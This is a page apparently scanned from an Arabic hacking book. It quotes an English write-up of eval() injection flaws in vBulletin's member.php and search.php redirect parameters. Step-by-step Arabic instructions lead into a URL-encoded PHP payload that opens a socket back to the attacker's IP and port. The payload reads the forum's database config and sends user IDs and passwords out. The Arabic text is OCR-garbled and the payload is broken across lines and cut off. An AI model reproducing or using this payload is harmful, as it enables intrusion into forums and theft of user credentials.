Page 313 - بسم الله الرحمن الرحيم
P. 313
The above example works with the "Lite" version. The commercial
versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
.have an eval() problem with URL redirecting, e.g
http://www.site.url/member.php?acti...ypass&url=hello"world
:and a similar one in the Lite version
http://www.site.url/search.php?
acti...s&templatecache[standardredirect]=hello"world
، تصنفذ في السيرفرurl م هذا أنت ممكن تصرسل أكواد ختلف. من الكل، م هذا ول داعي لترجهمه.تصعرفون الكل
: جهرب مثل، الغبيهhello+world تصضعها بدل الكلمه
vb 113 or 115 ركب في جههازك ملقم ويب أي ملقم تصحبه ممكن تصركب عليه-1
( عندك في جههازك )طريقه فتح البورت تصكون على مجازك90 أفتح البورت-2
هذا الى السيرفرurl أرسل الـ-3
search.php3?
action=simplesearch&query=searchthis&templatecache[standardredirec
t]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));
%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),
%26%24errno,%26%24errstr,substr("900" ,0,3));if(!%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads%20database,or%20press%20return
%20for
%20command%20line" ,0,63));%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if
strlen(%24va)>1))
{include(substr("admin/config.php",0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24serve
rname)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%2
4dbpassword" ,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu
ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20*
%20from%20user" ,0,18));while(%24res=mysql_fetch_array
%20(%24curre
nta))
{fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fputs(%24fp,"%24res
313
